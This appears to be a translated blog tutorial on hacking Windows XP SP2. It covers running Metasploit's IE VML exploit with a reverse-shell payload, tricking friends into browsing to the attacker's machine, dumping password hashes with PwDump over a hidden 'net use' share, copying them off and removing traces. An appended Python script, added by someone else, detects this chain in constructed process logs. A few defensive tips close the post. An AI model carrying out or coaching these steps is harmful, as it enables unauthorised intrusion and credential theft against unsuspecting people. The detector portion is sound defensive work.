Study Hack Yuck! (3) - Hack Windows XP SP2

After getting to know a few basic concepts and the 'standard' terms of hacking in the first part, and a little about exploits in the second part, we now go straight to practice. Here I deliberately use VMware for the simulation, because not everyone can practise this on a real network. With VMware we can simulate a simple network that appears to consist of our own computer and other computers. If you cannot use VMware, try searching on the internet! The operating system I use is Windows XP SP2.

The tools I use are the Metasploit Framework to run the exploit, and PwDump6 to take the password hash file from the target computer. What is the Metasploit Framework?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetration testing, shellcode development, and vulnerability research.

For more information about using Metasploit, you can also read the documentation included in the installation. To install Metasploit version 2.7 you need an administrator user. I tried installing as a 'limited user', but once installed it could not run. Actually, installing Metasploit is just unpacking the file, so you can install it without the admin user and put it anywhere, without having to install into the Program Files folder. However, after a little tinkering, it turns out it can run without admin. It's a bit complicated and I'm too lazy to cover it here, because when I tried the latest version, version 3 Beta 3, we could run it without having to install as the admin user. Why bother with that! Moreover, version 3 (still beta right now) has more and cooler features. Unfortunately msfweb (the web version) cannot run fully yet.

OK.. now I assume you have read the Metasploit user guide (ah.. my assumptions are usually wrong ;p). To keep it simple and easier to understand in detail, I will explain Metasploit using the console (msfconsole) only. Metasploit runs with Cygwin, because Metasploit is written in Perl. Now let's practise!

First, run 'msfconsole'!

To learn which commands are available in msfconsole, use the 'help' command.

Because the computer we want to target runs Windows XP SP2, we use an exploit that affects XP SP2: the Internet Explorer VML Fill Method Code Execution exploit.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the processing of VML code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

To view the info for this exploit, use the command:

MSF> info ie_vml_rectfill

The ie_vml_rectfill exploit targets a weakness in Internet Explorer. So this exploit only has an effect if the target machine runs IE and points its URL at the attacker's computer. For that we need a little 'social engineering': for example, at the boarding house / lab / office we tell our friends that we are trying out our latest web application, and show them how to open our IP address (or computer name) in IE. Usually, after this exploit has run and the target computer has connected, IE will crash. Give the exploit some time to 'work'. After a while just say "oh.. I got an error. OK, I'll fix it first... thanks." Then close IE from Task Manager (even then IE is still hard to kill; don't forget to 'end process' on 'dumpred.exe' too, but only after the exploit has worked :-D).

To run the exploit, use the following commands in the console:

MSF> use ie_vml_rectfill

MSF> set payload win32_reverse

MSF> set RHOST ip_target

MSF> set LHOST ip_attacker

MSF> exploit

The result will look like the image below:

In the example above, the target computer's IP (RHOST) is 192.168.186.128, and the attacker computer (LHOST) is our own IP. The payload used is 'win32_reverse', and the HTTP PORT is 80 (the default HTTP port). After running the 'exploit' command, we need the target machine to run IE and point its URL at our computer. This process takes some time, and sometimes does not succeed. So just keep trying and be patient :-D

If successful, you will get a 'cmd.exe' from the target computer.

Crack the Password!

Well, once we 'control' the target computer, we might as well look at its passwords. The method is similar to my earlier article on hacking Windows XP SP2 passwords, but because it is remote, we must 'provide' the required program, PwDump. For this to work, I assume the user logged in on the target computer has admin access. If the user on the target computer who used IE is only a 'normal' user, pwdump will not succeed!

First, share the PwDump folder from our computer with full access, so that the target computer can upload the password dump to it; end the share name with '$' so that it is not publicly visible. Suppose the shared folder is named PwDump$. Then, from the console on the successfully hacked machine, fetch PwDump by mapping a network drive from our computer with 'net use'. An example of the command used:

After that, copy PwDump to the temporary folder 'temp' on the target computer. Once PwDump has been copied to the target computer, run the PwDump command:

C:\temp> pwdump -o pass.txt

If successful, it will look like the image below.

Then copy the pass.txt file to our computer:

C:\temp> copy pass.txt z:

And finally, don't leave any trace that we have been there.
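Added example (mine, not code from the original post): the exploit sequence above and the PwDump steps leave a recognisable trail in process-creation telemetry, which is what a defender should watch for. This Python script runs simple rules over constructed Sysmon-style records (the field layout, the 10.0.0.5 address and the PwDump$ share name are my assumptions) and only reports the full chain when all four stages appear in order, rather than alerting on any single command.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# The sequence mirrors the post: IE spawns a shell, a hidden '$' share is
# mapped with 'net use', pwdump writes a hash file, the file is copied off.
SAMPLE_LOG = "\n".join([
    r"ParentImage=C:\Program Files\Internet Explorer\iexplore.exe|Image=C:\WINDOWS\system32\cmd.exe|CommandLine=cmd.exe",
    r"ParentImage=C:\WINDOWS\system32\cmd.exe|Image=C:\WINDOWS\system32\net.exe|CommandLine=net use z: \\10.0.0.5\PwDump$",
    r"ParentImage=C:\WINDOWS\system32\cmd.exe|Image=C:\temp\pwdump.exe|CommandLine=pwdump -o pass.txt",
    r"ParentImage=C:\WINDOWS\explorer.exe|Image=C:\WINDOWS\system32\notepad.exe|CommandLine=notepad.exe",
    r"ParentImage=C:\WINDOWS\system32\cmd.exe|Image=C:\WINDOWS\system32\cmd.exe|CommandLine=copy pass.txt z:",
])

def parse_record(line):
    """Split 'Key=value|Key=value' into a dict (values may contain '=' but not '|')."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

# One predicate per stage of the chain, in the order the post performs them.
# Deliberately simple so each rule is easy to audit; a real deployment would
# add time windows and parent/child correlation across hosts.
RULES = [
    ("browser_spawned_shell", lambda r: basename(r["ParentImage"]) == "iexplore.exe"
                                        and basename(r["Image"]) == "cmd.exe"),
    ("hidden_share_mapped", lambda r: basename(r["Image"]) == "net.exe"
                                      and re.search(r"\buse\b.*\\\\[^\s\\]+\\[^\s\\]+\$", r["CommandLine"], re.I)),
    ("credential_dump_tool", lambda r: basename(r["Image"]).startswith("pwdump")),
    ("dump_copied_to_mapped_drive", lambda r: re.match(r"copy\s+\S+\.txt\s+[a-z]:", r["CommandLine"], re.I)),
]

def scan(log_text):
    """Return (rule_name, record_index) for every record that trips a rule."""
    hits = []
    for i, line in enumerate(log_text.splitlines()):
        if line.strip():
            rec = parse_record(line)
            hits.extend((name, i) for name, pred in RULES if pred(rec))
    return hits

def credential_theft_chain(log_text):
    """True only when all four stages occur in order (a single hit is just noise)."""
    hits, last = scan(log_text), -1
    for stage, _ in RULES:
        idx = next((i for name, i in hits if name == stage and i > last), None)
        if idx is None:
            return False
        last = idx
    return True
```

Run `scan(SAMPLE_LOG)` to see each stage matched to its record, and `credential_theft_chain(SAMPLE_LOG)` for the combined verdict.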

Well, now I have the file. All that is left is to crack it.... (see the previous article on cracking passwords).

In fact, there is a lot to tinker with in Metasploit. Metasploit has many exploits, payloads, Meterpreter, etc., which are very 'fun' to tinker with. To learn Metasploit, there is fairly good documentation on its site.

Happy Hacking.....

Some suggestions so that our Windows stays safe from the exploit above.

1. Do not use Internet Explorer. Use Mozilla Firefox or Opera.

2. Patch your Windows.

3. Use anti-virus with the latest updates.

4. Be careful of your own friends.. stay alert!
